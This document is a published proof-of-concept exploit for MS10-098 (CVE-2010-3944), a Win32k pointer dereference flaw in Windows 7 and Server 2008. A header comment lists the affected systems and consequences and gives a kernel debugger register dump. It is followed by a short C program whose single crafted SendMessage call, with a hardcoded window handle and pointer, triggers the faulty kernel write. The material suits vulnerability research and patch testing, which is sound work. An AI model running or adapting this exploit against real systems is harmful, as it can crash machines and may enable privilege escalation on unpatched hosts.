Windows Win32k Pointer Dereference

`/*************************************************************************************  
* MS10-098  
* CVE-2010-3944  
*  
* Microsoft Windows Win32k pointer dereferencement  
*  
* --------------------  
* Affected Software  
* ------------------------  
* Microsoft Windows 7 / 2008  
*  
*  
* --------------------  
* Consequences  
* -----------------------  
* An unprivileged user may be able to cause a bugcheck, or possibly execute  
* arbitrary code by CSRSS.EXE.  
*  
*  
*  
* Credits : Stefan LE BERRE ([email protected])  
* Ludo t0ka7a  
*  
* WebSites : http://www.sysdream.com/  
* http://ghostsinthestack.org/  
* http://infond.blogspot.com/  
* http://twitter.com/hackinparis  
*  
* kd> r  
* eax=00013370 ebx=0000000d ecx=00000000 edx=fea0069c esi=fea00618 edi=fea00618  
* eip=8d72af90 esp=95b54a98 ebp=95b54b00 iopl=0 nv up ei ng nz na pe nc  
* cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286  
* win32k!xxxRealDefWindowProc+0xf6:  
* 8d72af90 c60000 mov byte ptr [eax],0 ds:0023:00013370=??  
*  
*************************************************************************************/  
  
#include <stdio.h>  
#include <windows.h>  
#include <Winuser.h>  
  
  
int main(int argc, char *argv[])  
{  
SendMessage((HWND) 16,(UINT) 13,0x80000000,0x00013370); // 0x13370 is the deref and 16 is the window handle of #32769  
return 0;  
}  
  
  
  
  
  
`